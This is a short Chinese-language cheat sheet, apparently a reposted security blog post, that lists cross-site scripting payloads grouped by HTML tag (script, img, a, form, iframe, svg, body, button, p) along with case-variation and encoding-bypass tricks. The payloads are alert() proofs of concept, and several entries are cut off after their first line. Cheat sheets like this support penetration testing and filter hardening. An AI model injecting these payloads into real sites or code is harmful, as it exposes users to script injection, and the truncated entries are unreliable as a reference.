转载自 Norah C.IV
一、标准语句
1 | <script>alert(/XSS/)</script> |
二、尝试大小写
1 | <sCript>alert(1)</scRipt> |
三、使用<img>标签
1 | 1、windows事件 |
四、使用<a>标签
1 | 1、使用href属性 |
五、使用<input>标签
1 | <input name="name" value=""> |
六、使用<from>标签
1 | <form action=javascript:alert('xss') method="get"><form action=javascript:alert('xss')> |
七、 使用<iframe>标签
1 | <iframe src=javascript:alert('xss')></iframe> |
八、 使用<svg>标签
1 | <svg onload=alert(1)> |
九、 使用<body>标签
1 | <body onload="alert(1)"> |
十、 使用<button>标签
1 | <button onclick="alert(1)">text</button> |
十一、 使用<p>标签
1 | <p onmousedown="alert(1)">text</p> |
十二、XSS编码绕过
1 | 1、html实体编码(10进制与16进制): |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 XR-SEC!